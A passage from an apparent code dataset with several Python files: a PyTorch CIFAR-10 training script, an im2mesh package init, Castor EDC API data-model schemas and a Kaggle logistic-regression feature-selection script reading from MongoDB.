CosineAnnealingWarmRestarts\nfrom utility.cosine_annealing_with_warmup_lr import CosineAnnealingWarmUpRestarts\nimport tensorboard\nfrom utils import progress_bar\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--adaptive\", default=True, type=bool,\n help=\"True if you want to use the Adaptive SAM.\")\n parser.add_argument(\"--batch_size\", default=128, type=int,\n help=\"Batch size used in the training and validation loop.\")\n parser.add_argument(\"--depth\", default=16, type=int,\n help=\"Number of layers.\")\n parser.add_argument(\"--dropout\", default=0.0,\n type=float, help=\"Dropout rate.\")\n parser.add_argument(\"--epochs\", default=150, type=int,\n help=\"Total number of epochs.\")\n parser.add_argument(\"--label_smoothing\", default=0.1,\n type=float, help=\"Use 0.0 for no label smoothing.\")\n parser.add_argument(\"--learning_rate\", default=0.1, type=float,\n help=\"Base learning rate at the start of the training.\")\n parser.add_argument(\"--momentum\", default=0.9,\n type=float, help=\"SGD Momentum.\")\n parser.add_argument(\"--threads\", default=2, type=int,\n help=\"Number of CPU threads for dataloaders.\")\n parser.add_argument(\"--rho\", default=0.5, type=int,\n help=\"Rho parameter for SAM.\")\n parser.add_argument(\"--weight_decay\", default=0.0005,\n type=float, help=\"L2 weight decay.\")\n parser.add_argument(\"--width_factor\", default=8, type=int,\n help=\"In case WideResNet, how many times wider compared to normal ResNet.\")\n parser.add_argument(\"--SAM\", default=False, type=bool,\n help=\"Use SAM optimizer or SGD.\")\n parser.add_argument('--resume', '-r', action='store_true',\n help='resume from checkpoint')\n args = parser.parse_args()\n\n initialize(args, seed=42)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Data\n print('==> Preparing data..')\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465),\n (0.2023, 0.1994, 0.2010)),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465),\n (0.2023, 0.1994, 0.2010)),\n ])\n\n trainset = torchvision.datasets.CIFAR10(\n root='./data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(\n trainset, batch_size=128, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(\n root='./data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(\n testset, batch_size=100, shuffle=False, num_workers=2)\n\n classes = ('plane', 'car', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck')\n\n # dataset = Cifar(args.batch_size, args.threads)\n\n # Logger\n # log = Log(log_each=10)\n log = LogNoLR(log_each=10)\n\n # which model to use (VGG, Preactivation ResNet,)\n # model = WideResNet(args.depth, 10, args.width_factor,\n # dropRate=args.dropout).to(device)\n model = VGG16().to(device)\n if device == 'cuda':\n model = torch.nn.DataParallel(model)\n best_acc = 0 # best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n hermite_bias_list = []\n hermite_weight_list = []\n for name, param in model.named_parameters():\n if 'bias' in name:\n hermite_bias_list.append(name)\n if 'wts' in name:\n hermite_weight_list.append(name)\n\n hermite_list = hermite_bias_list + hermite_weight_list\n params1 = list(map(lambda x: x[1], list(\n filter(lambda kv: kv[0] in hermite_bias_list, model.named_parameters()))))\n params2 = list(map(lambda x: x[1], list(\n filter(lambda kv: kv[0] in hermite_weight_list, model.named_parameters()))))\n # params3 = list(map(lambda x: x[1], list(\n # filter(lambda kv: kv[0] in hermite_weight2_list, model.named_parameters()))))\n # params3 = list(map(lambda x: x[1], list(\n # filter(lambda kv: kv[0] in w3, model.named_parameters()))))\n # params4 = list(map(lambda x: x[1], list(\n # filter(lambda kv: kv[0] in w4, model.named_parameters()))))\n base_params = list(map(lambda x: x[1], list(\n filter(lambda kv: kv[0] not in hermite_list, model.named_parameters()))))\n\n if args.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir(\n 'checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load('./checkpoint/ckpt.pth')\n model.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n\n # Optimizer (SGD or SAM): SAM shows slightly better accuracy compared to SGD\n if args.SAM is True:\n base_optimizer = torch.optim.SGD\n optimizer = SAM(\n [{'params': base_params},\n {'params': params1, 'weight_decay': 0, 'lr': args.learning_rate},\n {'params': params2, 'weight_decay': args.weight_decay /\n 2, 'lr': args.learning_rate},\n # {'params': params3, 'weight_decay': args.weight_decay /\n # 2, 'lr': args.learning_rate},\n # {'params': params4, 'weight_decay': args.weight_decay /\n # 2, 'lr': args.learning_rate}\n ],\n base_optimizer, rho=args.rho, adaptive=args.adaptive, lr=args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay)\n\n else:\n optimizer = torch.optim.SGD(\n [{'params': base_params},\n {'params': params1, 'weight_decay': args.weight_decay /\n 2, 'lr': args.learning_rate},\n {'params': params2, 'weight_decay': args.weight_decay /\n 2, 'lr': args.learning_rate},\n # {'params': params3, 'weight_decay': args.weight_decay /\n # 2, 'lr': args.learning_rate},\n # {'params': params4, 'weight_decay': args.weight_decay/2, 'lr': args.learning_rate}\n ],\n lr=args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay)\n\n scheduler = StepLR(optimizer, args.learning_rate, args.epochs)\n print(args.epochs, \" epochs\")\n if args.SAM is True:\n print(\"SAM optimizer\")\n else:\n print(\"SGD optimizer\")\n # print(list(model.parameters()))\n\n def train(epoch):\n print('\\nEpoch: %d' % epoch)\n model.train()\n train_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n if args.SAM is False:\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = smooth_crossentropy(outputs, targets)\n loss.mean().backward()\n if args.SAM is True:\n optimizer.first_step(zero_grad=True)\n smooth_crossentropy(model(inputs), targets).mean().backward()\n optimizer.second_step(zero_grad=True)\n else:\n optimizer.step()\n\n train_loss += loss.mean().item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (train_loss/(batch_idx+1), 100.*correct/total, correct, total))\n\n def test(epoch):\n global best_acc\n model.eval()\n test_loss = 0\n correct = 0\n total = 0\n with torch.no_grad():\n for batch_idx, (inputs, targets) in enumerate(testloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = model(inputs)\n loss = smooth_crossentropy(outputs, targets)\n\n test_loss += loss.mean().item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (test_loss/(batch_idx+1), 100.*correct/total, correct, total))\n\n acc = 100.*correct/total\n if acc > best_acc:\n best_acc = acc\n # Save checkpoint.\n print('Saving checkpoint..')\n state = {\n 'net': model.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, './checkpoint/ckpt.pth')\n\n # # Save torchscript\n with torch.no_grad():\n print('Saving Torch Script..')\n if not os.path.isdir('torchscript'):\n os.mkdir('torchscript')\n example = torch.rand(1, 3, 32, 32).to(device)\n traced_script_module = torch.jit.trace(model, example)\n traced_script_module.save(\"./torchscript/model.pt\")\n\n\nfor epoch in range(start_epoch, start_epoch+200):\n train(epoch)\n test(epoch)\n scheduler(epoch)\n\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n # for epoch in range(args.epochs):\n # model.train()\n # log.train(len_dataset=len(dataset.train))\n\n # for batch in dataset.train:\n # inputs, targets = (b.to(device) for b in batch)\n\n # if args.SAM is False:\n # optimizer.zero_grad()\n # predictions = model(inputs)\n # loss = smooth_crossentropy(predictions, targets)\n # loss.mean().backward()\n # if args.SAM is True:\n # optimizer.first_step(zero_grad=True)\n # smooth_crossentropy(model(inputs), targets).mean().backward()\n # optimizer.second_step(zero_grad=True)\n # else:\n # optimizer.step()\n\n # with torch.no_grad():\n # correct = torch.argmax(predictions.data, 1) == targets\n # # log(model, loss.cpu(), correct.cpu(), scheduler.lr())\n # # check which log function to use at line 61\n # log(model, loss.cpu(), correct.cpu())\n # scheduler(epoch)\n\n # model.eval()\n # log.eval(len_dataset=len(dataset.test))\n\n # with torch.no_grad():\n # for batch in dataset.test:\n # inputs, targets = (b.to(device) for b in batch)\n\n # predictions = model(inputs)\n # loss = smooth_crossentropy(predictions, targets)\n # correct = torch.argmax(predictions, 1) == targets\n # log(model, loss.cpu(), correct.cpu())\n\n # log.flush()\n"} {"ext": "py", "sha": "1a3015f7dd34484d6ac908e0b92ea79ba988ef16", "content": "from im2mesh.onet_upconv2d_occtolocal import (\n config, generation, training, models\n)\n\n__all__ = [\n config, generation, training, models\n]\n"} {"ext": "py", "sha": "1a3016f34bfed9bf3b2e0f9512f111566e863fd2", "content": "# -*- coding: [stf-8 -*-\n\"\"\"\nContains the definition of all data models according to the Castor EDC API.\n\n@author: R.C.A. van Linschoten\nhttps://orcid.org/0000-0003-3052-596X\n\"\"\"\n\naudit_trail_model = {\n \"datetime\": [dict],\n \"event_type\": [str],\n \"user_id\": [str],\n \"user_name\": [str],\n \"user_email\": [str],\n \"event_details\": [dict, list],\n}\n\ncountry_model = {\n \"id\": [\n str,\n ],\n \"country_id\": [\n str,\n ],\n \"country_name\": [\n str,\n ],\n \"country_tld\": [\n str,\n ],\n \"country_cca2\": [\n str,\n ],\n \"country_cca3\": [\n str,\n ],\n}\n\nsingle_country_model = {\n \"id\": [\n int,\n ],\n \"country_id\": [\n int,\n ],\n \"country_name\": [\n str,\n ],\n \"country_tld\": [\n str,\n ],\n \"country_cca2\": [\n str,\n ],\n \"country_cca3\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\ndevice_token_model = {\n \"device_token\": [str],\n \"record_id\": [str],\n \"created_on\": [dict],\n \"updated_on\": [dict],\n}\n\nexport_data_model = {\n \"Study ID\": [\n str,\n ],\n \"Record ID\": [\n str,\n ],\n \"Form Type\": [\n str,\n ],\n \"Form Instance ID\": [\n str,\n ],\n \"Form Instance Name\": [\n str,\n ],\n \"Field ID\": [\n str,\n ],\n \"Value\": [\n str,\n ],\n \"Date\": [\n str,\n ],\n \"User ID\": [\n str,\n ],\n}\n\nexport_structure_model = {\n \"Study ID\": [\n str,\n ],\n \"Form Type\": [\n str,\n ],\n \"Form Collection ID\": [\n str,\n ],\n \"Form Collection Name\": [\n str,\n ],\n \"Form Collection Order\": [\n str,\n ], # Actually int in database, but csv interprets everything as string\n \"Form ID\": [\n str,\n ],\n \"Form Name\": [\n str,\n ],\n \"Form Order\": [\n str,\n ], # Actually int in database, but csv interprets everything as string\n \"Field ID\": [\n str,\n ],\n \"Field Variable Name\": [\n str,\n ],\n \"Field Label\": [\n str,\n ],\n \"Field Type\": [\n str,\n ],\n \"Field Order\": [\n str,\n ], # Actually int in database, but csv interprets everything as string\n \"Field Required\": [\n str,\n ], # Actually bool in database, but csv interprets everything as string\n \"Calculation Template\": [\n str,\n ],\n \"Field Option Group\": [\n str,\n ],\n}\n\nexport_option_group_model = {\n \"Study ID\": [\n str,\n ],\n \"Option Group Id\": [\n str,\n ],\n \"Option Group Name\": [\n str,\n ],\n \"Option Id\": [\n str,\n ],\n \"Option Name\": [\n str,\n ],\n \"Option Value\": [\n str,\n ],\n}\n\nrole_model = {\n \"name\": [str],\n \"description\": [str],\n \"permissions\": [dict],\n \"_links\": [dict],\n}\n\nstudy_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [str, type(None)],\n}\n\nstudy_data_point_extended_model = {\n \"record_id\": [\n str,\n ],\n \"field_variable_name\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"updated_on\": [str, type(None)],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nstudy_step_model = {\n \"id\": [\n str,\n ],\n \"step_id\": [\n str,\n ],\n \"step_description\": [\n str,\n ],\n \"step_name\": [\n str,\n ],\n \"step_order\": [\n int,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nuser_model = {\n \"id\": [\n str,\n ],\n \"user_id\": [\n str,\n ],\n \"entity_id\": [\n str,\n ],\n \"full_name\": [\n str,\n ],\n \"name_first\": [str, type(None)],\n \"name_middle\": [str, type(None)],\n \"name_last\": [str, type(None)],\n \"email_address\": [\n str,\n ],\n \"institute\": [str, type(None)],\n \"department\": [str, type(None)],\n \"last_login\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nuser_study_model = {\n \"id\": [\n str,\n ],\n \"user_id\": [\n str,\n ],\n \"entity_id\": [\n str,\n ],\n \"full_name\": [\n str,\n ],\n \"name_first\": [str, type(None)],\n \"name_middle\": [str, type(None)],\n \"name_last\": [str, type(None)],\n \"email_address\": [\n str,\n ],\n \"institute\": [str, type(None)],\n \"department\": [str, type(None)],\n \"manage_permissions\": [dict],\n \"institute_permissions\": [list],\n \"last_login\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nstudy_model = {\n \"crf_id\": [\n str,\n ],\n \"study_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"created_by\": [\n str,\n ],\n \"created_on\": [\n str,\n ],\n \"live\": [\n bool,\n ],\n \"randomization_enabled\": [\n bool,\n ],\n \"gcp_enabled\": [\n bool,\n ],\n \"surveys_enabled\": [\n bool,\n ],\n \"premium_support_enabled\": [\n bool,\n ],\n \"main_contact\": [\n str,\n ],\n \"expected_centers\": [int, type(None)],\n \"duration\": [int, type(None)],\n \"expected_records\": [int, type(None)],\n \"slug\": [\n str,\n ],\n \"version\": [\n str,\n ],\n \"domain\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_model = {\n \"id\": [\n str,\n ],\n \"report_id\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"type\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_instance_model = {\n \"id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"status\": [\n str,\n ],\n \"parent_id\": [\n str,\n ],\n \"parent_type\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"report_name\": [\n str,\n ],\n \"archived\": [\n bool,\n ],\n \"created_on\": [\n str,\n ],\n \"created_by\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"report_instance_id\": [\n str,\n ],\n \"report_instance_name\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n}\n\nreport_data_point_extended_model = {\n \"record_id\": [\n str,\n ],\n \"field_variable_name\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n \"report_instance_id\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_step_model = {\n \"id\": [\n str,\n ],\n \"report_step_id\": [\n str,\n ],\n \"report_step_name\": [\n str,\n ],\n \"report_step_description\": [\n str,\n ],\n \"report_step_number\": [\n int,\n ],\n \"_links\": [\n dict,\n ],\n \"_embedded\": [\n dict,\n ],\n}\n\nsurvey_model = {\n \"id\": [\n str,\n ],\n \"survey_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"intro_text\": [\n str,\n ],\n \"outro_text\": [\n str,\n ],\n \"survey_steps\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n}\n\npackage_model = {\n \"id\": [\n str,\n ],\n \"allow_open_survey_link\": [bool],\n \"survey_package_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"intro_text\": [\n str,\n ],\n \"outro_text\": [\n str,\n ],\n \"sender_name\": [\n str,\n ],\n \"sender_email\": [\n str,\n ],\n \"auto_send\": [\n bool,\n ],\n \"allow_step_navigation\": [\n bool,\n ],\n \"show_step_navigator\": [\n bool,\n ],\n \"finish_url\": [\n str,\n ],\n \"auto_lock_on_finish\": [\n bool,\n ],\n \"default_invitation\": [\n str,\n ],\n \"default_invitation_subject\": [\n str,\n ],\n \"is_mobile\": [bool],\n \"expire_after_hours\": [int, type(None)],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsurvey_package_instance_model = {\n \"id\": [\n str,\n ],\n \"survey_package_instance_id\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"institute_id\": [\n str,\n ],\n \"institute_name\": [\n str,\n ],\n \"survey_package_id\": [\n str,\n ],\n \"survey_package_name\": [\n str,\n ],\n \"invitation_subject\": [\n str,\n ],\n \"invitation_content\": [\n str,\n ],\n \"created_on\": [\n dict,\n ],\n \"created_by\": [\n str,\n ],\n \"sent_on\": [dict, type(None)],\n \"first_opened_on\": [dict, type(None)],\n \"finished_on\": [dict, type(None)],\n \"available_from\": [dict],\n \"expire_on\": [str, type(None)],\n \"all_fields_filled_on\": [dict, type(None)],\n \"started_on\": [dict, type(None)],\n \"locked\": [\n bool,\n ],\n \"archived\": [\n bool,\n ],\n \"survey_url_string\": [\n str,\n ],\n \"progress\": [\n int,\n ],\n \"auto_lock_on_finish\": [\n bool,\n ],\n \"auto_send\": [\n bool,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsurvey_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"survey_instance_id\": [\n str,\n ],\n \"survey_name\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n}\n\nsurvey_package_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"survey_instance_id\": [\n str,\n ],\n \"survey_name\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n \"survey_package_id\": [\n str,\n ],\n}\n\nsurvey_data_point_extended_model = {\n \"record_id\": [\n str,\n ],\n \"field_variable_name\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n \"survey_instance_id\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsurvey_step_model = {\n \"id\": [\n str,\n ],\n \"survey_step_id\": [\n str,\n ],\n \"survey_step_name\": [\n str,\n ],\n \"survey_step_description\": [\n str,\n ],\n \"survey_step_number\": [\n int,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nfield_dep_model = {\n \"id\": [\n int,\n ],\n \"operator\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"parent_id\": [\n str,\n ],\n \"child_id\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nfield_model = {\n \"id\": [\n str,\n ],\n \"parent_id\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"field_number\": [\n int,\n ],\n \"field_label\": [\n str,\n ],\n \"field_variable_name\": [str, type(None)],\n \"field_enforce_decimals\": [bool, type(None)],\n \"field_type\": [\n str,\n ],\n \"field_required\": [\n int,\n ],\n \"field_hidden\": [\n int,\n ],\n \"field_info\": [\n str,\n ],\n \"field_units\": [\n str,\n ],\n \"field_min\": [\n int,\n float,\n type(None),\n ],\n \"field_min_label\": [\n str,\n type(None),\n ],\n \"field_max\": [\n int,\n float,\n type(None),\n ],\n \"field_max_label\": [\n str,\n type(None),\n ],\n \"field_summary_template\": [\n str,\n type(None),\n ],\n \"field_slider_step\": [\n str,\n int,\n type(None),\n ],\n \"report_id\": [\n str,\n ],\n \"field_length\": [\n int,\n type(None),\n ],\n \"additional_config\": [\n str,\n ],\n \"exclude_on_data_export\": [\n bool,\n ],\n \"option_group\": [\n dict,\n type(None),\n ],\n \"metadata_points\": [\n list,\n ],\n \"validations\": [\n list,\n ],\n \"dependency_parents\": [\n list,\n ],\n \"dependency_children\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n \"field_image\": [str, None],\n}\n\nfield_opt_model = {\n \"id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"layout\": [\n bool,\n ],\n \"options\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nfield_val_model = {\n \"id\": [\n int,\n ],\n \"type\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"operator\": [\n str,\n ],\n \"text\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\ninstitute_model = {\n \"id\": [\n str,\n ],\n \"institute_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"abbreviation\": [\n str,\n ],\n \"code\": [str, type(None)],\n \"order\": [\n int,\n ],\n \"country_id\": [\n int,\n ],\n \"deleted\": [\n bool,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nmetadata_model = {\n \"id\": [\n str,\n ],\n \"metadata_type\": [\n dict,\n ],\n \"parent_id\": [str, type(None)],\n \"value\": [\n str,\n ],\n \"description\": [str, type(None)],\n \"element_type\": [\n str,\n ],\n \"element_id\": [str],\n \"_links\": [\n dict,\n ],\n}\n\nmetadata_type_model = {\n \"id\": [\n int,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nphase_model = {\n \"id\": [\n str,\n ],\n \"phase_id\": [\n str,\n ],\n \"phase_description\": [str, type(None)],\n \"phase_name\": [\n str,\n ],\n \"phase_duration\": [int, type(None)],\n \"phase_order\": [\n int,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nquery_model = {\n \"id\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"status\": [\n str,\n ],\n \"first_query_remark\": [\n str,\n ],\n \"created_by\": [\n str,\n ],\n \"created_on\": [\n dict,\n ],\n \"updated_by\": [\n str,\n ],\n \"updated_on\": [\n dict,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nrandomization_model = {\n \"randomized_id\": [str, type(None)],\n \"randomization_group\": [str, type(None)],\n \"randomization_group_name\": [str, type(None)],\n \"randomized_on\": [dict, type(None)],\n \"_links\": [\n dict,\n ],\n}\n\n\nrecord_model = {\n \"id\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"ccr_patient_id\": [\n str,\n ],\n \"randomized_id\": [str, type(None)],\n \"randomization_group\": [str, type(None)],\n \"randomization_group_name\": [str, type(None)],\n \"randomized_on\": [dict, type(None)],\n \"last_opened_step\": [str, type(None)],\n \"progress\": [\n int,\n ],\n \"status\": [\n str,\n ],\n \"locked\": [bool],\n \"archived\": [\n bool,\n ],\n \"archived_reason\": [str, type(None)],\n \"created_by\": [\n str,\n ],\n \"created_on\": [\n dict,\n ],\n \"updated_by\": [\n str,\n ],\n \"updated_on\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nrecord_progress_model = {\n \"record_id\": [\n str,\n ],\n \"steps\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsteps_model = {\n \"step_id\": [\n str,\n ],\n \"complete\": [\n int,\n ],\n \"sdv\": [\n bool,\n ],\n \"locked\": [\n bool,\n ],\n \"signed\": [\n bool,\n ],\n}\n\nstatistics_model = {\n \"study_id\": [\n str,\n ],\n \"records\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nstats_records_model = {\n \"total_count\": [\n int,\n ],\n \"institutes\": [\n list,\n ],\n}\n\nstats_institutes_model = {\n \"institute_id\": [\n str,\n ],\n \"institute_name\": [\n str,\n ],\n \"record_count\": [\n int,\n ],\n}\ndata_options = {\n \"numeric\": \"1\",\n \"date\": \"11-11-2017\",\n \"string\": \"testing\",\n \"dropdown\": \"1\",\n \"radio\": \"1\",\n \"textarea\": \"testing\",\n \"slider\": \"5\",\n \"checkbox\": \"1\",\n \"calculation\": \"5\",\n \"year\": \"2005\",\n}\n"} {"ext": "py", "sha": "1a301712abadc14d6a6b8fb81f0639cd1a1b4dd8", "content": "# https://www.kaggle.com/c/amazon-employee-access-challenge/forums/t/4838/python-code-to-achieve-0-90-auc-with-logistic-regression\n\n__author__ = 'Miroslaw Horbal'\n__email__ = 'miroslaw@gmail.com'\n__date__ = '14-06-2013'\n\nimport json\n\nimport pymongo as pymongo\nfrom numpy import array\nfrom sklearn import metrics, linear_model\nfrom sklearn.model_selection import train_test_split\nfrom scipy import sparse\nfrom itertools import combinations\n\nimport numpy as np\nimport pandas as pd\n\nSEED = 25\n\n\ndef group_data(data, degree=3, hash=hash):\n \"\"\" \n numpy.array -> numpy.array\n \n Groups all columns of data into all combinations of triples\n \"\"\"\n new_data = []\n m, n = data.shape\n for indicies in combinations(range(n), degree):\n new_data.append([hash(tuple(v)) for v in data[:, indicies]])\n return array(new_data).T\n\n\ndef OneHotEncoder(data, keymap=None):\n \"\"\"\n OneHotEncoder takes data matrix with categorical columns and\n converts it to a sparse binary matrix.\n\n Returns sparse binary matrix and keymap mapping categories to indicies.\n If a keymap is supplied on input it will be used instead of creating one\n and any categories appearing in the data that are not in the keymap are\n ignored\n \"\"\"\n if keymap is None:\n keymap = []\n for col in data.T:\n uniques = set(list(col))\n keymap.append(dict((key, i) for i, key in enumerate(uniques)))\n total_pts = data.shape[0]\n outdat = []\n for i, col in enumerate(data.T):\n km = keymap[i]\n num_labels = len(km)\n spmat = sparse.lil_matrix((total_pts, num_labels))\n for j, val in enumerate(col):\n if val in km:\n spmat[j, km[val]] = 1\n outdat.append(spmat)\n outdat = sparse.hstack(outdat).tocsr()\n return outdat, keymap\n\n\ndef create_test_submission(filename, prediction):\n content = []\n for i, p in enumerate(prediction):\n content.append({\n 'id': '%i' % (i + 1),\n 'ACTION': '%f' % p\n })\n f = open(filename, 'w')\n json.dump(content, f)\n f.close()\n print('Saved')\n\n\n# This loop essentially from Paul's starter code\ndef cv_loop(X, y, model, N):\n mean_auc = 0.\n for i in range(N):\n X_train, X_cv, y_train, y_cv = train_test_split(\n X, y, test_size=.20,\n random_state=i * SEED)\n model.fit(X_train, y_train)\n preds = model.predict_proba(X_cv)[:, 1]\n auc = metrics.roc_auc_score(y_cv, preds)\n print(\"AUC (fold %d/%d): %f\" % (i + 1, N, auc))\n mean_auc += auc\n return mean_auc / N\n\n\ndef main(user, password):\n print(\"Reading dataset...\")\n client = pymongo.MongoClient(\"mongodb://%s:%s@businessdb:27017\" % (user, password))\n train_data = pd.read_json(json.dumps(list(client.test.train.find({}, {'_id': 0}))), orient='records')\n test_data = pd.read_json(json.dumps(list(client.test.test.find({}, {'_id': 0}))), orient='records')\n all_data = np.vstack((train_data.iloc[:, 1:], test_data.iloc[:, :]))\n\n num_train = np.shape(train_data)[0]\n\n # Transform data\n print(\"Transforming data...\")\n dp = group_data(all_data, degree=2)\n dt = group_data(all_data, degree=3)\n\n y = array(train_data.iloc[:, 0])\n X = all_data[:num_train]\n X_2 = dp[:num_train]\n X_3 = dt[:num_train]\n\n X_test = all_data[num_train:]\n X_test_2 = dp[num_train:]\n X_test_3 = dt[num_train:]\n\n X_train_all = np.hstack((X, X_2, X_3))\n X_test_all = np.hstack((X_test, X_test_2, X_test_3))\n num_features = X_train_all.shape[1]\n\n model = linear_model.LogisticRegression()\n\n # Xts holds one hot encodings for each individual feature in memory\n # speeding up feature selection \n Xts = [OneHotEncoder(X_train_all[:, [i]])[0] for i in range(num_features)]\n\n print(\"Performing greedy feature selection...\")\n score_hist = []\n N = 10\n good_features = set([])\n # Greedy feature selection loop\n while len(score_hist) < 2 or score_hist[-1][0] > score_hist[-2][0]:\n scores = []\n for f in range(len(Xts)):\n if f not in good_features:\n feats = list(good_features) + [f]\n Xt = sparse.hstack([Xts[j] for j in feats]).tocsr()\n score = cv_loop(Xt, y, model, N)\n scores.append((score, f))\n print(\"Feature: %i Mean AUC: %f\" % (f, score))\n good_features.add(sorted(scores)[-1][1])\n score_hist.append(sorted(scores)[-1])\n print(\"Current features: %s\" % sorted(list(good_features)))\n\n # Remove last added feature from good_features\n good_features.remove(score_hist[-1][1])\n good_features = sorted(list(good_features))\n print(\"Selected features %s\" % good_features)\n\n print(\"Performing hyperparameter selection...\")\n # Hyperparameter selection loop\n score_hist = []\n Xt = sparse.hstack([Xts[j] for j in good_features]).tocsr()\n Cvals = np.logspace(-4, 4, 15, base=2)\n for C in Cvals:\n model.C = C\n score = cv_loop(Xt, y, model, N)\n score_hist.append((score, C))\n print(\"C: %f Mean AUC: %f\" % (C, score))\n bestC = sorted(score_hist)[-1][1]\n print(\"Best C value: %f\" % (bestC))\n\n print(\"Performing One Hot Encoding on entire dataset...\")\n Xt = np.vstack((X_train_all[:, good_features], X_test_all[:, good_features]))\n Xt, keymap = OneHotEncoder(Xt)\n X_train = Xt[:num_train]\n X_test = Xt[num_train:]\n\n print(\"Training full model...\")\n model.fit(X_train, y)\n\n print(\"Making prediction and saving results...\")\n preds = model.predict_proba(X_test)[:, 